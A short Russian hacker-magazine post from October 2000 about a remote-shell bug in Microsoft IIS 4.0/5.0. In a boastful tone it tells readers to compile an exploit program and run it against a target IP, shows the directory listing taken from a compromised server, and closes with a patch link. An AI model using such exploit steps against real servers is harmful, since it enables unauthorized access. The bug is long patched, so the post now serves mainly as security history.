Привет Перцы, свеженький
баг от 19 октября 2000 г!

Позволяет нам творить
безумные вещи на серваках NT/IIS4.0/IIS5.0 Ошибки в
передаваемом URL дают REMOTE SHELL… Для
нормальной работы свежего exploit`а
нужен *NIX shell, вводим в joe следующий текст,
сохраняемся Ctrl+K->X, затем компилим: gcc iis-zank.c,
запускаем :

./iis-zank -t IP_OF_TARGET -i

Все…. Мы можем делать все
,что угодно, пример:
C> dir c:\
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Mon, 23 Oct 2000 07:34:45 GMT
Content-Type: application/octet-stream
Volume in drive C is SOMEONE
Volume Serial Number is 3914-1581

 Directory of c:\

11.05.00  13:03         <DIR>         
DOS
11.05.00  13:03         <DIR>         
I386
11.05.00  13:03         <DIR>         
HP
22.02.99  14:40                    
47 AUTOEXEC.BAT
23.02.99  16:55                    
87 CONFIG.SYS
11.05.00  13:19         <DIR>         
WINNT
11.05.00  13:15         <DIR>         
BATCH
11.05.00  13:21         <DIR>         
Program Files
11.05.00  13:23         <DIR>         
TEMP
11.05.00  13:23         <DIR>         
InetPub
11.05.00  14:00         <DIR>         
MSSQL7
11.05.00  14:12         <DIR>         
Microsoft Site Server
11.05.00  14:17         <DIR>         
exchsrvr
18.05.00  09:59         <DIR>         
DNews
11.05.00  13:21                   
294 BOOT.PCP
23.10.00  11:34                   
642 STATS.LOG
10.08.00  12:21                     
0 QUERY.LOG
28.08.00  15:02               
262 144 28_08_2000.evt
28.08.00  15:02               
524 288 28_08_2000_Application.evt
11.10.00  08:54                
65 536 sys.mdb
             
20 File(s)        853═038 bytes
                           
565═411═840 bytes free

Инфа для нерадивых
админов — пофиксить дыру можно скачав и
установив patch: 
http://www.microsoft.com/ntserver/nts/downloads/critical/q269862

Оставить мнение

Check Also

Эхо кибервойны. Как NotPetya чуть не потопил крупнейшего морского перевозчика грузов

Российское кибероружие, построенное на утекших у АНБ эксплоитах, маскировалось под вирус-в…